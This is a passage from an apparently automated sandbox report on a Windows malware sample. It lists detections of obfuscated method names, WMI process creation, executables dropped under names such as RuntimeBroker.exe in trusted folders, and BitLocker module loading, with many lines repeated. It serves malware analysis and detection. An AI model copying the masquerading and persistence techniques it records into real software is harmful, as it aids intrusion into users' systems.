                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, kYjPt6f4T86huM442EQ.csHigh entropy of concatenated method names: 'quxmN38dRah', 'HY0mZU8K1yA', 'NkpPs0m6HPeMkWlVcABc', 'J77QMOm6gKGa78MkGN7Y', 'iYQyUcm6ueU2Jck5N1kH', 'D6Omwom6YlfXk9IPreRN', 'LJoffYm6THwMyCXUAqaM', 'qWGGoKm6EoGltdSG3s8b', 'imx5Ubm61Fi9mkUngkty', 'hgTqdem6nVlqTvg4ilTe'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, d18TymLBEsK6BX6EeSO.csHigh entropy of concatenated method names: 'aa6mNIaNCrT', 'nIELsy2NPh', 'G1eLrwvY6o', 'yabLbijEYn', 'wNXWuKmftCJhDu74Alru', 'aKj7jSmfGox8skHWgjtA', 'lvYXfjmfMMuuqTtI34Ns', 'pyDR89mfKuiFSFNYfk9X', 'velPeymfemFcqhAQSQlg', 'yd6M2omfc2C9eS56CxrJ'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, GqOalmT5Z2aqYkP1sQv.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'nkDTCroE25', 'p91mNE5SRKe', 'TPZQPHmhLAsvH4RFZJbq', 'ohnGeWmhjd7Vn1iOSrQX', 'fiaPfTmh4OhI0kkKa9SE', 'w9l2osmhAE7U5DS6xC8V', 'tn3Fjsmh87fUAqwhHdNZ'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, A0BGNotVOjpeM7MEYF2.csHigh entropy of concatenated method names: 'tHwGor8994', 'lpBGmZM9WF', 'D8SGa8ienM', 'MNuGFBe4g4', 'iW6GyQ6x0w', 'NPFG0N0UCN', 'YCpXuamsf68fi7mRCHmM', 'KBDM87msdv2Z5IApblCs', 'jk6VX3msDaEpdifcwGWN', 'w3ICyPms7era5gdcKBVM'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, H6dPO6KNSIL0vqaACcI.csHigh entropy of concatenated method names: 'aTIKXhpBbb', 'UALKJFem9x', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'R64KQn8w80', 'method_2', 'uc7'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, PTFUPT1Lfm14KABDSnU.csHigh entropy of concatenated method names: 'ySx1iD4dbC', 'O6b1sJcBlQ', 'QKk1rUSW8Z', 'lD6Qk4m8HOtnHHq8plT1', 'AHq6jPm8gccdSsClFi9H', 'l8hotem8uOORuxMwhPR5', 'teY18hJ31j', 'OWr1hWeLg3', 'Awu19QJCxa', 'e2UAfSm8XL6YDEtMLFQM'

                                Persistence and Installation Behavior

                                barindex
                                Creates processes via WMI
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Drops executable to a common third party application directory
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile written: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exeJump to behavior
                                Drops executables to the windows directory (C:\Windows) and starts them
                                Source: unknownExecutable created and started: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\kZFyeAfm.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeFile created: C:\mshypercomponentSavesdll\agentFont.exeJump to dropped file
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeJump to dropped file
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dllJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\cvxIvGPF.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\HhjUFBqv.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\HOfmkikL.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\rEqPmwUs.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exeJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exeJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exeJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\AnJfWYZZ.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Recovery\ApplicationFrameHost.exeJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\HhjUFBqv.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\kZFyeAfm.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\cvxIvGPF.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\HOfmkikL.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\AnJfWYZZ.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile created: C:\Users\user\Desktop\rEqPmwUs.logJump to dropped file

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
